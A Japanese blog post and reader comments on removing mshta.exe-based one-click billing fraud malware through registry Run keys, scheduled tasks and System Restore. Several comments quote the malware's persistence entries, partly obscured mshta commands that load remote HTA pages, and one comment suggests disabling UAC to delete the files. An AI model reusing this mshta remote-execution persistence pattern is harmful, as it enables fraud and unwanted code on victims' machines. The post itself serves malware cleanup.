mshta.exeによるワンクリック不正請求詐欺サイト 月桂樹葉

    ネットやPC関連のことを中心に思いつくままに。

    ホーム > セキュリティ > mshta.exeによるワンクリック不正請求詐欺サイト

    mshta.exeによるワンクリック不正請求詐欺サイト

    不正請求画面が現れて困っている方のための記事です。
    この記事を最初に書いてから、サービスも手口もどんどん増えてきました。

    超初心者・簡単な解決方法をお探しの方・金銭的余裕のある方は【駆除方法5】を
    初心者は【駆除方法3、5】を
    Windows8の方は【駆除方法3、4,5】を最初にご覧になることをお薦めします。
    中・上級者は他の方法やコメント欄もご覧ください。(以上2013年追記)

    友人から、
    「アダルトサイトを見た後、会費請求画面が現れる。消えない。
    mshta.exe というプログラムが悪さをしているらしいが、
    スタートアップ項目からmshta.exeを解除しても、再起動すると現れる。」
    という相談を電話で受けました。

    【駆除方法1】だいたい INTERNET Watch「画像で見るワンクリック詐欺サイトの新たな手口」にも書いてありますが、友人の場合はレジストリ設定が違いました。

    ○スタート→ファイル名を指定して実行→msconfig.exeと入れて
    ( Windows7 の場合はスタート→すぐ上の「プログラムとファイルの検索」のところに「msconfig」と入力)
    「スタートアップ」タグをクリックして、そこにあるmshtaのチェックをはずす(そこにmshtaがない場合は、スタートアップには登録されてない)
    ○スタート→ファイル名を指定して実行→regedit.exeと入れて
    ( Windows7 の場合はスタート→すぐ上の「プログラムとファイルの検索」のところに「regedit」と入力)
     マイコンピュータ\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
     にあるデータ項目の中に
     ~backf/XXXXXXXXXX.htaという文字列が最後にあるやつを削除しました。

     この2つのことをしただけで再起動して、直しました。
     
     XXXXXXXXXXの部分は、意味のない数字またはアルファベットの羅列です。 
     XXXXXXXXXX.htaの文字列は後ろのほうに隠れていました。

     追記:まったく別のファイル名(またはURL)の場合もあるようですが、要は、最後に”.hta”とついているデータを削除します。長いデータの場合、後ろのほうが隠れていますが、その上にカーソルを乗せると、全部のデータが読めるようになります。
     削除の仕方はそのデータの左側の名前の部分をクリックしてから、編集→削除ですね。

     追記2:データ部分が mshta http://… php? … タイプ(最後に .htaがつかない)も報告いただきました。

     追記3:以下の場所にも潜んでいることがある、というご報告をいただきました。
    マイコンピューター\HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    マイコンピューター\HKEY_USER\(各ユーザー)\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

     追記4:同様に以下の場所にも潜んでいることがある、というご報告をいただきました。 2014.3.14 UP!
             \HKEY_CURRENT_USER\SOFTWARE\Microsoft\ Windows\CurrentVersion\Run
             \HKEY_CURRENT_USER\SOFTWARE\Microsoft\ Windows\CurrentVersion\Runonce
             \HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SharedTools\MSConfig\startupreg\RegWritezn
             \HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SharedTools\MSConfig\startupreg\SystemBootzn

     ※駆除方法1は、レジストリを編集することになるので、自己責任でやってくださいね。
      また、自信がない場合は編集しないように。

    【駆除方法2】2010.9.20 UP!

    上記の方法では解決できない不正請求画面のご報告をいただきました。
    また、上記の方法で削除しても、また表示されるなどの現象が起きる場合にも試してみてください。
    (ファイルの見極めも必要なので、駆除方法2は熟練者向け。熟練者以外は駆除方法3以降へ。)

    Windows XPの場合
    C\Windows\System32\Tasksの中を探してみてください。
    あやしげなものがあれば、フォルダTasksの外に出してみてください。
    (例えば、デスクトップなどに。)
    不正請求画面がずっと出なくなればそのタスクが原因の可能性大です。

    タスクの内容を確認するには、
    怪しげなタスクを右クリック→プロパティ→タスクTabの中で
    実行するファイル名がわかりますので、チェックすることができます。
    チェックして、それが原因だとわかれば、削除してかまいません。

    Windows7(Vista)の場合
    スタート→コントロールパネル→システムのメンテナンス
    →管理ツール→タスクスケジュールをダブルクリックすると
    タスクの状態やアクティブなタスクの一覧が出てきますから、そこから怪しいものを探しましょう。
    右の実行中のすべてのタスクの表示でわかることもあると思いますが、わからなければ、
    一覧に場所が表示されていますから、そこからそのタスクファイルを探し出し
    右クリック→開く→メモ帳などとすると中身がわかりますので、
    実行するファイルを見つけることもできるでしょう。
     また、このタスクスケジューラの削除の方法がトレンドマイクロ社のページに図解入りで載っているというご報告をいただきました。2012.11.13UP!
    前半部分に載っています。たいへんわかりやすいので参考にしてください。
    http://esupport.trendmicro.co.jp/pages/JP-2079467.aspx
    後半部分のシステムチューナーを使った解決手順というのは、[駆除方法1]の替わりだと思いますが、それもやってみたい方は駆除方法4に無料体験版について書いてありますので、それを参考にしてください。

    【駆除方法2.1】感染日時が、わかっている場合には、
    スタート→検索→ファイルとフォルダすべて→いつ変更されましたか?→日付指定→検索ボタン
    として、"日時"と書いてあるところをクリックして時間順に並べます。
    感染日時と同じ時間のファイルをチェックすると見つかる可能性があります。

    Windows7の場合の探し方は、スタート→(右側の)コンピュータ→
    →開いたウィンドウの右上の検索窓に「更新日時:」と入力します。
    このとき、「:」は半角英数の「:」です。
    そうするとカレンダーが表示されますから、日付を選んでください。(クリックで拡大)
    serchcalender.png

    【駆除方法3】初心者にオススメのシステムの復元(Windows 8 / Windows 7 / Windows Vista / Windows XP )
    IPA(独立行政法人情報処理推進機構)の
    【注意喚起】ワンクリック請求に関する相談急増!http://www.ipa.go.jp/security/topics/alert20080909.htmlにある
    5.復旧方法の(a)「システムの復元」http://www.ipa.go.jp/security/restore/による復旧は、たいていの場合有効で、OS別に詳しい手順書がありますから、初心者には特におすすめです。
    また、5.(b)「システムの初期化」は、どんな場合にも有効です。システムを初期化する場合は、重要なデータのバックアップを行ってから実施してください。システムの初期化の手順などについては、パソコンの説明書を参照するか、メーカーへ問い合わせをお願いします。

    【駆除方法4】ウィルスバスターを使った解決法Windows 8 / Windows 7 / Windows Vista / Windows XP )
    トレンドマイクロのサイトにウィルスバスターでの駆除方法が載りました。2011.8.8UP!
    持っていない方は、下記のところで30日間無料体験版もダウンロードできます。
    ウイルスバスター公式トレンドマイクロ・オンラインショップ

    【駆除方法5】超初心者・金銭的に余裕のある方にオススメ!
    また、トレンドマイクロ社では、不正請求クリーンナップサービスをしているので、自信のない方はこのサービスを利用するのもいいのではないでしょうか。トレンドマイクロ社のサービスなので信頼がおけます。サポート電話で個別に解決してくれます。価格は7980円です。
    この方法で駆除した方のコメントもお待ちしています。
    注意!コメントによれば、二次被害の出る有料・無料のソフトを、駆除に有効だとしているサイトもあるようです。気をつけましょう。

    【その他の駆除方法】新しい種類が次々と出ています。有志の方が新しい手口とその対処方法をコメント欄に書いてくださってますので、それらを参考にしてください。(一応、自己責任ということで。)   ※なお、コメントを編集させていただく場合があります。

    【駆除・対処方法がわからない場合、不安なことがある場合】
      IPA(独立行政法人情報処理推進機構)の電話相談窓口「コンピュータウイルス 110番」に相談してみましょう。(追記)↓
    最近は、問い合わせが多いらしく、【注意喚起】ワンクリック請求に関する相談急増!とそこにリンクされている安心相談窓口の「よくある相談と回答(FAQ):ワンクリック請求」を読んで、まだ質問がある場合は相談してほしい、と記述が追加されていました。(2011年3月)

    【最後に】mshta.exeはウィルスではありませんから、削除する必要はありません。
    他で使う時があります。削除しても、再起動すると復活します。
    mshta.exeが開くXXXXXXXXXX.htaファイルが請求画面を出しているのです。
  1. [ 2010/02/14 18:54 ] セキュリティ | トラックバック(-) | コメント欄(247) | edit
  2. 見えにくいところに隠れてました!
    [ 2010/02/18 21:40 ] [ 編集 ]
    直りました。いろんな対処法サイト見ましたが
    このサイトが一番懇切丁寧で、具体的で分かりやすかったです。ありがとうございました
    [ 2010/08/05 11:46 ] [ 編集 ]
    コメントありがとうございました。お役に立てて嬉しく思います。
     
    ※なお、コメントしてくださった方が
    サイト名とURLの欄にこちらのブログ情報を入れてくださいました。
    [ 2010/08/05 12:08 ] [ 編集 ]
    本当にありがとうございます。
    [ 2010/08/28 19:04 ] [ 編集 ]
    直ったようで良かったですv-218
    コメントの投稿欄の項目で
    サイト名とURLのところは送信者様のブログなどの情報を入れて紹介してくださいね。
    なければ、題名とお名前だけで、サイト名とURLは空欄で構いません(^_^)
    [ 2010/08/30 00:01 ] [ 編集 ]
    掲示されているファイルは見つかりませんでしたが、エクスプローラーで「hta」を検索し、ヒットしたファイルを削除、msconfigで削除したファイルにに関連していた項目のチェックをはずした所を、治りました。
     解説文で原因が分かったおかげです。ありがとうございました。
    [ 2010/09/01 07:11 ] [ 編集 ]
    ご自分のやり方で治されたのですね。すばらしいです!表示されるファイルのほうを消したのですね。

    参考になさる方のために。
    普通にスタート→検索で「*.hta」を検索しても、正常なファイルしか出てこない時があります。
    (友人の場合がこれにあたりました。)

    これは、見えない領域に、原因のファイルが潜んでいるからです。
    起動時に請求画面が表示される場合は、記事の~Run項目の一番右端のデータ項目も全部見るようにしてみてくださいね。カーソルを乗せると隠れている文字も全部見ることができます。
    [ 2010/09/01 15:02 ] [ 編集 ]
    上記の要領でやってみたのですが、.htaファイルが見つかりません。そういった場合もあるのでしょうか?
    [ 2010/09/01 20:16 ] [ 編集 ]
    上記の要領とは、Runのデータをすべてチェックしたということでしょうか?データは1個ずつチェックされたということでいいでしょうか?htaがなくてもURL(http://で始まる)のデータはありますか?
    [ 2010/09/01 20:48 ] [ 編集 ]
    Runの中にないようです。
    ちなみにスタートアップを停止させると表示されなくなったりしますでしょうか?
    [ 2010/09/01 20:56 ] [ 編集 ]
    私は、時間がかかりましたが、Cドライブすべてを検索したら見つかりました。
    [ 2010/09/01 21:09 ] [ 編集 ]
    http://blog.trendmicro.co.jp/archives/2729
    ウイルスバスターの「システムチューナー」でワンクリックウェアによるレジストリ改変を修正(図8参照)して対応しました。その結果、表示はされなくなったのですが、これで根本的な解決になっているのでしょうか?
    不躾な質問で申し訳ないのですがいかがでしょうか?
    [ 2010/09/01 21:17 ] [ 編集 ]
    良かったですね(^^)v

    trendmicroについては、いずれ紹介しようと思っていたので、それを利用なさったのなら、いいと思います。
    [ 2010/09/01 21:19 ] [ 編集 ]
    そうですか。ありがとうございました。
    偶然感染してしまったので困っていたところです。
    本当にありがとうございました。
    [ 2010/09/01 21:24 ] [ 編集 ]
    mshta.exeによる、ワンクリック不正請求に悩まされています。。。
    タスクマネージャで見ると、mshta.exeで動いていることが確認できます。
    それで「タスクの終了」or「プロセスの終了」で一時的に閉じることはできるのですが、しばらくするとまた勝手に立ち上がってきてしまいます。
    それで、上記に記載されている方法を確認したのですが、、、
    レジストリの中を「mshta」で検索してみても、それらしいhtaファイルもしくはURLはありません。。。
    また、msconfigを見てみても、スタートアップの中に、「mshta」「.hta」もしくはURLのものはありません。。。
    また、OS(Win7)の検索で、htaファイルを探したのですが、それでも見つかりません。。。
    消しても消しても、しばらくすると何度も何度も立ち上がってくるので、悲しくなってきます。。。
    必ずどこかに原因はあるのだろうとは思うのですが、、、他に考えられることはないでしょうか?
    [ 2010/09/17 12:49 ] [ 編集 ]
    レジストリのRunの中は目視でも確認されましたか?
    (編集→検索ではなく)
    怪しげなデータ項目はありませんか?
    [ 2010/09/17 15:13 ] [ 編集 ]
    月桂樹葉様、コメントありがとうございます。
    レジストリの中の、
    コンピューター\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    コンピューター\HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    コンピューター\HKEY_USER\(各ユーザー)\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    は目視で確認しましたが、どこにも怪しげなデータ項目はありません。。。
    [ 2010/09/17 23:45 ] [ 編集 ]
    怪しげなデータがないとすると、システムの復元を使用して、コンピュータを以前の状態まで戻す方法があります。(友人の場合、この方法でも消えました。)また、お尋ねさんが紹介してくださったようにhttp://blog.trendmicro.co.jp/archives/2729の方法でもうまくいくかもしれません。trendmicroのウィルスバスターのお試し版が無料であるので、それをダウンロードしてみてはいかがでしょうか?結果を報告していただけると他の方の参考にもなると思いますので、よろしくお願いいたします。
    [ 2010/09/18 00:54 ] [ 編集 ]
    恥ずかしながら、私もリンクを色々辿って行ったらこのスパイウェアに感染し困っていましたので参考にさせていただきました
    (>_<)さんと同様に目視、検索でもxxx.htaなる怪しげなファイルが存在してませんでした
    一応2台PCがあるので、無事な方と比べても、対策にかかれてるような怪しいファイルを見つけることはできませんでした
    最近はレジストリ中に.htaを作成しないのもあるのかもしれません
    私は復元することで駆除できました
    [ 2010/09/18 09:06 ] [ 編集 ]
    (´・ω・`)さん、貴重な情報ありがとうございました。たしかに、最近はレジストリ中に.htaを作成しないのもあるみたいですね。ただ復元は、有効ということですね。
    (>_<)さん、復元の方法は、IPAの
    http://www.ipa.go.jp/security/restore/
    のページと、そのページの1番下のOS別の手順を参考になさると良いでしょう。がんばってくださいね。

    2度と被害にあわないためにIPA(独立行政法人情報処理推進機構)の
    http://www.ipa.go.jp/security/topics/alert20080909.html
    から読むともっと良いですね。
    [ 2010/09/18 11:56 ] [ 編集 ]
    月桂樹葉さん、いろいろとありがとうございます。
    システムの復元はやったことがないので気が重かったため、最後の悪あがきと思い、Cドライブ内をもう一度探し回りました。
    感染(?)した日時はわかっているので、それをもとに探しました。
    で、とうとう怪しそうなファイルを見付けました!
    C\Windows\System32\Tasks
    の中に「541544e31a93ad240af27992d92ffe96」というファイルがあり、作成日時は"感染"した日時でした。(拡張子はなにもついていなくて、単に「ファイル」となってました)
    それでこのファイルをメモ帳で開いたところ、htmlタグで書かれており、
    <Command>mshta</Command>
    <Arguments>サイトURL</Arguments>
    という記述もありました。
    そこでこのファイルをゴミ箱に移動したところ、もう請求画面は表れなくなりました!(デスクトップに移動しても大丈夫みたいです)
    これで、システムの復元を行わなくてもすみました。
    これって、他の人の参考にもなるでしょうか?
    いろいろありがとうございました!

    ※今後は十分に気を付けます。。。
    [ 2010/09/20 14:40 ] [ 編集 ]
    WOW!Good Jobです!

    タスクスケジューラーに組み込むなんてなんと巧妙な手口に発展しているのでしょう。
    ウィルスによってはここに潜んでいるやつもいますね。
    これじゃレジストリを探しても見つからないわけです。
    ファイル名は、友人のXXXXXXXXXX.htaのXXXXXXXXXXの部分と同じパターンですね。

    他の方もたいへん参考になると思います。
    ご報告ありがとうございました。
    [ 2010/09/20 15:14 ] [ 編集 ]
    月桂樹葉さん有り難うございました。中学生の息子が家族皆で使用しているPCを使用し、見事に引っかかりました。一人で留守番している間にアダルトサイトを見たようで、請求画面が消えず、わなわな震えながら私に相談してきました。わたしもアダルトサイトを見たことがあるので一概に叱ることも出来ず、もう二度と変なサイトをのぞかいないように約束させ、家族には内緒でPC上に数分おきに出てくる請求画面を何とかする約束をしました。
    しかしなかなか自分でその解決方法が判らず本当に困っていました。
    なんとかこのサイトに到達し解決しました。

    息子との約束も無事に果たせ一安心です。しかし驚いたことにレジストリを正常に戻すソフトをダウンロードさせ、さらにそのソフトを売りつけようとするサイトがあるんですね。
    日本の将来を危惧します。
    [ 2010/09/27 15:04 ] [ 編集 ]
    こういうご報告を伺うと、このサイトをやっていて良かったなぁ、としみじみ思います。
    請求画面が出ても振り込む必要はないのですが、お子さんはどうしてよいかわからなかったのでしょうね。
    お父さんに相談なさったのは賢明でした。
    お子さんのために奮闘されたようで、良いお父さんですね。
    [ 2010/09/27 16:50 ] [ 編集 ]
    【駆除方法1】で駆除できました。
    請求画面などで検索すると、
    マニュアルでの削除は素人には無理とか書かれていて、
    オンラインスキャンでもチェックされず、
    mshta.exeで検索したところ、
    このページにたどり着きました。
    どうもありがとうございます。
    [ 2010/11/07 03:34 ] [ 編集 ]
    コメントありがとうございました。
    治すのに苦労なさったみたいですね。
    お役に立てて幸いです(^_^)
    [ 2010/11/07 12:54 ] [ 編集 ]
    こちらのサイトのおかげで請求画面が消えました。ありがとうございました。

    私も駆除方法1でできました。
    レジストリ削除はおかげさまで簡単にできたのですが、ファイルの場所がレジストリで見てわかっているのに検索できず、ファイルの削除に苦労したのでお役にたつかもと思い書かせていただきます。

    ちなみにDocuments and settings>アプリケーションデータの中にありました。
    OSはvistaです。

    まず、通常のファイル検索ですと隠れているファイルやシステムファイルが表示できないので
    1、エクスプローラーを開き>整理のタブをクリック
    2、フォルダと検索のオプションをクリック
    3、表示のタブをクリック
    4、すべてのファイルとフォルダを表示するにチェック
    5、保護されたオペレーションファイルを表示しないのチェックを外す

    これで表示できるようになります。
    ただこの状態だとアクセス権限で拒否されてしまうので

    1、Administratorでログイン
    2、コントロールパネル>ユーザーアカウント
    3、ユーザーアカウント制御の有効化または無効化
    4、コンピューターの保護に役立たせるのチェックを外す
    5、対象のフォルダのプロパティ>セキュリティ
    6、アクセス許可のフルコントロールがチェックされていないユーザー(初期だとEveryone?)の削除
    7、詳細設定をクリックし、「すべての子孫の既存の継承可能なアクセス許可すべてを、このオブジェクトからの継承可能なアクセス許可で置き換える」にチェックを入れる。

    これでやっとアクセスできるようになるので後は削除するだけです。vistaは大変でした、、、
    長文失礼いたしました。
    [ 2010/11/10 08:55 ] [ 編集 ]
    長文ありがとうございました!!

    当方は、XPのために、この操作はできません。
    レジストリを削除すればファイルは存在していても請求画面は出ず悪さもしないのですが、
    できれば、すっきりしたいもの。

    高度な方法のようなので、意味が良くわからない方はレジストリの削除までにすること。
    また、ファイルを削除した後は、アカウントの設定を元に戻したほうがいいでしょうね。
    [ 2010/11/10 11:48 ] [ 編集 ]
    このサイトにたどり着く前に、タスクマネージャーからmshta.exeのプロセスを終了。(同時に画面に現れなくなった)
    再起動しても、また現れることはない(スタートアップにも関連してないらしい)です。
    ファイルは何一つゴミ箱送りにはしていません。
    メールアドレスが心配です。
    [ 2010/11/12 05:21 ] [ 編集 ]
    投稿ありがとうございました。

    タスクマネージャで終了させたら、再起動してもタスクマネージャにmshta.exeが出なくなってどうしよう、ということでしたら…
    タスクマネージャでは、現在バックグラウンドでどういうプログラムが動いているか表示しているので、そこからmshta.exeを終了したとしても、mshta.exeが削除されたわけではありません。

    mshta.exeをタスクマネージャから終了させただけで、請求画面が削除できた、ということでしたら…
    良かったと思います(^.^)ただ、その場合、【駆除方法2】のような時限式の可能性もありますので、一応、警戒しておいたほうがいいかもしれませんね。
    [ 2010/11/12 14:43 ] [ 編集 ]
    ぷるっぷーさんより以下のコメントをいただきました。


    タイトル:助かりました^^


    月桂樹葉さん はじめまして


    普段アダルトサイトに行かないだけに簡単に引っかかってしまいました><;

    状況が既出と少し異なるようなので、書いておきます。

    レジストリの
    コンピューターHKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionRun

    その中にファイル名が下記の3つがあり
    start_b1771942b89e69f0c9e541f6d5a1a37dc263e17b_233
    start_b1771942b89e69f0c9e541f6d5a1a37dc263e17b_234
    start_b1771942b89e69f0c9e541f6d5a1a37dc263e17b_235

    それぞれ以下の様な文字列データが入っていました
    C:WINDOWSsystem32mshta http://ima(中略).com
    C:WINDOWSsystem32mshta http://ima(中略).com
    C:WINDOWSsystem32mshta http://igb(中略).com

    一番上のアドレスへ飛んだところ、画面に出力される請求画面で、下の2つは何もありませんでした。
    私は3つとも消し問題なかったですが、一番上だけ消しても表示されなくなります。

    そのあと日付で検索をかけた結果、画面を開いたその時間に5つのファイルが作成されていることを発見
    C:WINDOWSPrefetch内に
    MSHTA.EXE-331DF029.pf    ←ブラウザ用のMSコマンドらしい
    SCHTASKS.EXE-0CBF6A11.pf  ←バッチファイルを動かすらしい
    WMPLAYER.EXE-18DDEF9C.pf ←MSのメディアプレーヤーを動かすらしい
    CONIME.EXE-13EEEA1A.pf   ←コマンドプロンプトと関係あるらしい
    SETUP_WM.EXE-3135CBD6.pf  ←MSのメディアプレーヤーと関連あるらしい

    上の2つは怪しいだけに消したかったですが、上の3つは削除どころかメモ帳で開くことすらできませんでした。
    ただ、http://esupport.trendmicro.co.jp/Pages/JP-28565.aspx
    でpfファイル自体には不正コードは含まれないとのこと、それを信じて作業終了することにしました。

    月桂樹葉さんのお陰で容易に表示させなくできました感謝感謝ですw


    PS

    >そういえはビビアン・スーさんが完全ヌード写真集のを取ったときの動画が流出しているんです。

    ↑というコメントにまんまと乗せられて怪しいなぁと思いながらもビビアン見たさにチャレンジ・・・
    復旧後確認しましたがビビアンは出て来ない唯のアダルトサイト。悔しいので一通り見てやりましたw


    ********************

    月桂樹葉のコメント

    新しい情報を詳しくありがとうございました!!
    サイトのURLが書いてあったので、リンクを間違って踏んで誤爆する方が出ないように、
    そこの部分だけ編集させていただきました。折角書いていただいたのにすみません。
    また、そのURLは危ないURL一覧のサイトにもう登録されているようです。

    PSの「悔しいので一通り見てやりました」の部分を読んで笑ってしまいました。
    けれども、さらなる罠が潜んでいることも考えられますので、他の方は真似なさらないように(^^;;
    [ 2010/11/12 15:24 ] [ 編集 ]
    スタートアップにもレジストリにもTasksにも怪しいファイルはありませんでした…。
    感染した日時も覚えていません…。
    復元しかないでしょうか。
    [ 2010/12/05 15:00 ] [ 編集 ]
    上の「ぷるっぷーさんより」というコメントにあるようなRunの中の不自然な物はありませんでしたか?
    [ 2010/12/05 15:22 ] [ 編集 ]
    再度探してみましたがそのようなファイルは見当たりませんでした。
    場所はあってる筈なんですが…。
    [ 2010/12/05 16:29 ] [ 編集 ]
    そうでしたか…。
    感染日もわからないということでしたら、復元するのが確実かもしれませんね。
    復元対象として指定した日から現在までに行ったアプリケーションソフトウェアのインストール、アップデートの情報は消えてしまいますので、これらはシステム復元後に再度インストール、アップデートを実施してくださいね。
    [ 2010/12/05 18:16 ] [ 編集 ]
    そうですか、ありがとうございます。

    復元をすると保存したファイルなどは消えるのですか?
    [ 2010/12/05 18:46 ] [ 編集 ]
    消えないはずですが、重要なデータは念のためバックアップを取ることを勧めているメーカーもあります。
    [ 2010/12/05 22:20 ] [ 編集 ]
    このサイトを参考に架空請求のウインドウを消す事が出来ました><
    ありがとうございます。

    自分の場合ではHKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionRun
    に shfa というファイルが存在しておりこれがmshtaに関連しているようでした。

    "shfa"="C:\\WINDOWS\\system32\\mshta.exe \"C:\\Documents and Settings\\kamikami\\Application Data\\shfa\\movie.hta\""

    となってました。
    詳しい事はわかりませんがお礼を兼ねて報告させていただきますm(__)m

    このレジストリを消したところ再起動してもウインドウは開きませんでした。
    [ 2010/12/05 22:34 ] [ 編集 ]
    消えて良かったです(^^)
    また、詳しいご報告ありがとうございました。
    これで、今夜はぐっすり眠れますねv
    [ 2010/12/05 23:14 ] [ 編集 ]
    3時間ほど前に、ワンクリック詐欺にあってから、ずっとパソコンと格闘していました。
    請求の画面が消えず、パソコンに明るくない私はずっと検索ワードを入れながらこちらにやっとたどり着き、請求画面はようやく消えました!!

    Vistaのセーフモードでのシステムの復元で回復しました。
    システムの復元については知恵袋などでも紹介されていたのでやってみたのですが、こちらほど詳しくなく解決しませんでした。
    しかし、こちらのサイトは本当に詳しく解説されていて、おかげさまでいつものきれいな画面になりました。

    初期化するしかないのかと、どん底に落ちていましたが、本当によかったです!
    ありがとうございました。

    感動しすぎて長文になってしまいましたが、本当に感謝しています。
    [ 2010/12/30 01:00 ] [ 編集 ]
    S…という削除ソフトを薦めてくださった方がいらっしゃったので、
    Googleで調べましたところ、詳しい解説サイトの中に
    セキュリティソフトにひっかかるサイトがありました。

    "見つかったウィルスの数109"と表示されました。
    そのソフトについて調べようとする他の方にウィルスが感染するといけませんので
    残念ながらコメントを削除させていただきました。
    すみません。

    また知名度の高いソフト以外は安全性が確認できませんので、
    ソフトを使わない方法を紹介していただけると助かります。


    ------------------------------------------------------

    ゆりさんへ

    新年を明るい気持ちで迎えられそうで良かったです!
    コメントありがとうございました。

    [ 2010/12/30 13:50 ] [ 編集 ]
    駆除方法2で解決しました。
    ほんとにウザイ広告でしたので助かりました。
    ありがとうございます!
    [ 2011/01/08 13:37 ] [ 編集 ]
    はじめまして。当方もひっかかってしまいました。

    win vista環境で
    C:\ProgramData\adhhh
    なるフォルダが作成されており、
    ご丁寧に表示されるjpgなどが格納されて
    いましたので、adhhhというフォルダ名を
    変更して(削除でもよいのかもしれません。)
    駆除方法1のレジストリを削除しました。

    このフォルダ配下には
    2.dat
    bg.jpg
    x5961755.hta
    という3つのファイルがありました。

    あまーい言葉にだまされることながいよう以降気をつけます!
    [ 2011/01/10 18:26 ] [ 編集 ]
    余程、あまい言葉だったのでしょうね!
    詳しいご報告ありがとうございました。
    [ 2011/01/10 21:16 ] [ 編集 ]
    私もパラメヒコさんと同じファイルが原因だったのですが、
    runのフォルダには該当するデータが見つからなかったので
    レジストリ内全てを検索してみてようやく発見できました。
    ただレジストリを検索する際は、あらかじめ検索設定の「値」のチェックを外す必要がありそうです。(そうしないと検出されませんでした)
    その後「mshta」と入力して、検索結果から「webadhhh」というものが表示されれば、多分ビンゴです
    [ 2011/01/17 10:40 ] [ 編集 ]
    一般的にファイルの名前はいろいろあるのですが、同じだったのですね。
    ご報告ありがとうございます。
    [ 2011/01/17 22:19 ] [ 編集 ]
    今日の4時ごろやられてしまいました・・・
    スタートの検索をクリック、日付けを指定、1月19日で検索しました。
    次に4時ごろに更新されたファイルは全て消しました。
    これでよかったのでしょうか?

    [ 2011/01/19 21:20 ] [ 編集 ]
    それは、ちょっとまずいような気もしますが、
    ちょっとこの1,2日、仕事で寝る時間もないありさまで詳しいアドバイスができません。
    すみません。

    どなたか、上のお名前なしの方にアドバイスお願いします<m(__)m>
    [ 2011/01/20 01:02 ] [ 編集 ]
    今日起動したらまたあの画面が出てきました。
    ちなみに駆除方法1のやりかたで、スタートアップのタブのなかにmshta exeがありませんでした。

    方法2のやりかたではC\Windows\System32\Tasksの中を探す方法が分かりませんでした。
    アドバイスお願いします。
    初心者ですいません。
    [ 2011/01/20 17:03 ] [ 編集 ]
    検索設定を変えてみましたか?
    プログラムは、mshta.exeが動かしているので
    検索欄にあらかじめ「mshta」と入力して、横にある
    「値」のチェックをはずしてからレジストリを探してみてください。
    そこでデータ名がアドレス(httpからはじまる物)になっていたり、webadhhh等の見た目からして怪しいものがあった場合にはデータを存在している場所を確認してから直に削除しましょう
    [ 2011/01/23 21:53 ] [ 編集 ]
    何度も投稿ありがとうございます(^_^)

    以前から言っていますが、
    良くわからない方、自信がない方は
    レジストリを編集しないほうがいいですね。
    [ 2011/01/23 22:42 ] [ 編集 ]
    駆除方法1の、○スタート→ファイル名を指定して実行→regedit.exeのやり方を何度かやりましたら、出なくなりました。

    ほっとしました。
    ありがとうございました!
    [ 2011/01/25 13:03 ] [ 編集 ]
    beeさん、出なくなったとのこと良かったです(^^)v
    [ 2011/01/25 13:49 ] [ 編集 ]
    kさんからのコメント

    > タイトル おそらく…

    > いままでの質問みさせてもらったので、だいたいあってると思うのですが・・・
    > 自信がないのでアドバイスお願いします。
    >
    > 駆除方法1、2もだめでした。
    > レジストリでHKEY_USERSのとこをmshtaで検索をしたら
    >
    > f!mshtaがあったので削除したのですが・・・
    > もう一つ怪しいのが
    > 名前:sitemap_35025eaed6ab1418d57cc5d36213923d
    > データ:C:Windowssystem32mshta (h)ttp://exxx.oxxxxxxxx.net/reg2.php?cid=35025eaed6ab1418d57cc5d36213923d
    >
    > これも削除したらいいのでしょうか?
    >
    >
    > HKEY_CURRENT_USERSでも検索したところ・・・
    > 名前:mahta.exe
    > データ:{"debug":null,"ei":"TtxATca1EYHCcaH-nNON","hasEbmTidbits":true,"href":"http://blog.trendmicro.co.jp/archives...
    > マウスカーソルをもっていっても表示できないくらい続いてます。
    >
    > HKEY_LOCAL_MACHINEでも検索したところ・・・
    > 名前:f!mahta.exe
    > データ:6d 00 73 00 68 00...と英数字が続いてます。
    >
    > こっちも削除ですか?
    >
    > ながながと書いてしまいましたが、よろしくお願いします。

    ***********************
    ここからコメントの返信

    すみません、間違って踏む人が出ないように一部xxxxと伏字にさせていただきました。
    それで、今までの例からいくと、
    (h)ttp://exxx.oxxxxxxxx.net/~
    は、怪しいと思います。

    他については、はっきりしたことは言えません。

    一番怪しいところを削除して様子を見たらいかがでしょうか?
    あくまでも自己責任で。

    自信がなければ【駆除方法3】をおすすめします

    なお、結果と怪しいデータがあったHKEY_USERS以下のパスも教えていただけると
    他の方の参考になると思います。
    (もちろん【駆除方法3】の結果でもいいです。)
    [ 2011/01/27 23:53 ] [ 編集 ]
    kさんより

    > 怪しいのを削除してみようと思います。
    >
    > HKEY_USERS以下のパスは
    >
    > HKEY_USERS\S-1-5-21-29xxxxxxxx-18xxxxxxxx-25xxxxxxxx-1000\Software\Microsoft\Windows\CurrentVersion\Run

    **************************
    ここからコメントの返信です

    やはりRunの中ですね。
    情報ありがとうございました。
    [ 2011/01/28 17:42 ] [ 編集 ]
    遅くなってすみません(汗)
    Tasksの中を探す方法について
    少し、説明を加えましたが、いかがでしょうか。
    [ 2011/01/28 18:16 ] [ 編集 ]
    怪しいのを削除したところ広告は消えました。

    が・・・

    パソコンの起動など動作は問題ありませんが
    IEの調子が・・・
    FLASHが表示されなかったり、ダウンロードできなかったり、起動するたびに「既定検索プロバイダーの設定が破損しています」とひどいです。

    失敗なのか成功なのか・・・

    とりあえず、レジストリ修復ソフトを入れて、どうにかならないかと
    何か良いソフトがあればお願いします・・・
    [ 2011/01/28 19:54 ] [ 編集 ]
    気になっていたことがあったのですが、
    f!mshtaを削除したそうですが、
    レジストリのHKEY_USERS以下のどこにありましたか?
    具体的にどういうデータでしたか?
    削除してはいけない物でなかったか心配です。

    不調なのが確実にIEだけならば、IEを再インストールすれば直るかもしれません。

    追加コメントで、あるレジストリ修復ソフトの具体名をあげていらっしゃいましたが、
    ネット上の評判も必ずしも良くありませんし、安全性も確認できませんので、
    当方としては、【駆除方法3】で
    感染前のレジストリに戻した方がいいと考えます。
    [ 2011/01/29 04:21 ] [ 編集 ]
    方法2で無事に消すことができました!
    丁寧な解説にとてもたすかりました。ありがとうございます。
